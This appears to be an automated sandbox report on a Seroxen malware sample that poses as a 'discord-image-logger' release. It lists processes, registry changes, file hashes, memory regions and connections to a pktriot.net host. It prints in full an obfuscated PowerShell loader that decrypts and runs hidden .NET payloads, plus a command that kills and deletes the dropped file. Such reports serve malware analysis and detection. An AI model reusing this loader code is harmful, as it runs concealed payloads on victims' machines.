System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{83febc94-1ca6-478f-8026-e03b441fe7c1}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3c5b91d6-04b0-4f4a-a74e-50dec0c968d1}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e7f6cb63-c51b-41a7-b34e-90e070577354}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"
C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/4252-6-0x00007FF894013000-0x00007FF894015000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dj1kg15s.2ae.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4252-16-0x0000024079190000-0x00000240791B2000-memory.dmp
memory/4252-17-0x00007FF894010000-0x00007FF894AD1000-memory.dmp
memory/4252-18-0x00007FF894010000-0x00007FF894AD1000-memory.dmp
memory/4252-19-0x0000024020310000-0x000002402033C000-memory.dmp
memory/4252-20-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp
memory/4252-21-0x00007FF8B1410000-0x00007FF8B14CE000-memory.dmp
memory/4252-22-0x00007FF894013000-0x00007FF894015000-memory.dmp
memory/4252-23-0x0000024020680000-0x000002402163C000-memory.dmp
memory/4252-25-0x0000024021640000-0x0000024021928000-memory.dmp
memory/4252-27-0x0000024021930000-0x0000024021BC8000-memory.dmp
memory/4252-26-0x00007FF894010000-0x00007FF894AD1000-memory.dmp
memory/4252-28-0x0000024021BD0000-0x0000024021C28000-memory.dmp
memory/4252-30-0x0000024021C30000-0x0000024021C3C000-memory.dmp
memory/4252-29-0x00007FF894010000-0x00007FF894AD1000-memory.dmp
memory/5108-35-0x0000000140000000-0x0000000140004000-memory.dmp
memory/5108-33-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4252-31-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp
memory/4128-55-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp
memory/4128-56-0x00007FF8B1410000-0x00007FF8B14CE000-memory.dmp
memory/4128-57-0x000001B575060000-0x000001B575460000-memory.dmp
memory/4128-58-0x000001B575460000-0x000001B575BD6000-memory.dmp
memory/4128-59-0x000001B575BE0000-0x000001B575FFA000-memory.dmp
memory/4128-60-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp
memory/4128-67-0x000001B576740000-0x000001B5767F2000-memory.dmp
memory/4128-66-0x000001B576630000-0x000001B576680000-memory.dmp
memory/4128-68-0x000001B576AB0000-0x000001B576C72000-memory.dmp
memory/4128-80-0x00007FF8B1410000-0x00007FF8B14CE000-memory.dmp
memory/4128-79-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp
memory/3728-82-0x0000000140000000-0x0000000140029000-memory.dmp
memory/3728-83-0x00007FF8B2AB0000-0x00007FF8B2CA5000-memory.dmp
memory/3728-84-0x00007FF8B1410000-0x00007FF8B14CE000-memory.dmp
C:\Windows\System32\ucrtbased.dll
| MD5 | 7873612dddd9152d70d892427bc45ef0 |
| SHA1 | ab9079a43a784471ca31c4f0a34b698d99334dfa |
| SHA256 | 203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf |
| SHA512 | d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083 |
C:\Windows\System32\vcruntime140d.dll
| MD5 | a366d6623c14c377c682d6b5451575e6 |
| SHA1 | a8894fcfb3aa06ad073b1f581b2e749b54827971 |
| SHA256 | 7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6 |
| SHA512 | cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11 |
C:\Windows\System32\vcruntime140_1d.dll
| MD5 | 9ef28981adcbf4360de5f11b8f4ecff9 |
| SHA1 | 219aaa1a617b1dfa36f3928bd1020e410666134f |
| SHA256 | 8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a |
| SHA512 | ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c |
memory/3728-81-0x0000000140000000-0x0000000140029000-memory.dmp
memory/4128-78-0x000001B5765E0000-0x000001B57660E000-memory.dmp
memory/3728-94-0x0000000140000000-0x0000000140029000-memory.dmp
memory/964-111-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/1144-126-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/1172-135-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/1172-134-0x000001A5B0690000-0x000001A5B06B7000-memory.dmp
memory/1152-132-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/1152-131-0x000001DC03E60000-0x000001DC03E87000-memory.dmp
memory/1156-129-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/1156-128-0x0000011645590000-0x00000116455B7000-memory.dmp
memory/1144-125-0x000001E5A5BC0000-0x000001E5A5BE7000-memory.dmp
memory/960-123-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/960-122-0x0000018BE5BB0000-0x0000018BE5BD7000-memory.dmp
memory/428-115-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/428-114-0x000001FC6A9A0000-0x000001FC6A9C7000-memory.dmp
memory/964-110-0x000002191B9D0000-0x000002191B9F7000-memory.dmp
memory/316-108-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/316-107-0x000001D334910000-0x000001D334937000-memory.dmp
memory/676-103-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/676-102-0x00000176F7EE0000-0x00000176F7F07000-memory.dmp
memory/588-99-0x00007FF872B30000-0x00007FF872B40000-memory.dmp
memory/588-98-0x000001B9F4C50000-0x000001B9F4C77000-memory.dmp
memory/588-97-0x000001B9F4C20000-0x000001B9F4C41000-memory.dmp
memory/4252-852-0x00007FF8A4933000-0x00007FF8A4934000-memory.dmp
memory/4252-854-0x00007FF894010000-0x00007FF894AD1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20241023-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2808 wrote to memory of 2684 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2808 wrote to memory of 2684 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2808 wrote to memory of 2684 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2684 wrote to memory of 2664 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2684 wrote to memory of 2664 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2684 wrote to memory of 2664 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2684 wrote to memory of 2664 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 0f948adab6823f1898be9db39ff7debb |
| SHA1 | 36672c3f675cc91e7e615f30b572619e25e45f5a |
| SHA256 | a3cd44e09c90567367fe793d938c59a30e8f2844f769ebbf4bcfbb33554fd5e6 |
| SHA512 | 0a6a3d4362c92c115054d32488de2cefe97e3739554a38eacb3ac68217041064eb459a3994164c004913caaffe316410baa1be4408049ffedbdaf8112326937b |
Analysis: behavioral5
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2492 wrote to memory of 2184 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2492 wrote to memory of 2184 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2492 wrote to memory of 2184 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2184 wrote to memory of 2836 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2184 wrote to memory of 2836 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2184 wrote to memory of 2836 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2184 wrote to memory of 2836 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 5e32b031e7056ac3d4cfd7930526f53a |
| SHA1 | 1640491037ba4ff3abefd8b0cf9fd6b7246ec505 |
| SHA256 | 1dab35e64e8597fe292c7b9af60eb6dbfeb5e81ebbe04e18fcac2a1cb5f70da6 |
| SHA512 | e404490b9ad96d95c308ebadf50e696fb12103e1e59f6fa930be34916003aa8de88b56bb57afad9cddefbd57471c5b37cb914142be4de4319b542cdebabb9711 |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Seroxen family
Seroxen, Ser0xen
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/1968-7-0x000007FEF5F1E000-0x000007FEF5F1F000-memory.dmp
memory/1968-8-0x000000001B4C0000-0x000000001B7A2000-memory.dmp
memory/1968-9-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp
memory/1968-10-0x0000000001D10000-0x0000000001D18000-memory.dmp
memory/1968-12-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp
memory/1968-11-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp
memory/1968-13-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp
memory/1968-14-0x000007FEF5C60000-0x000007FEF65FD000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
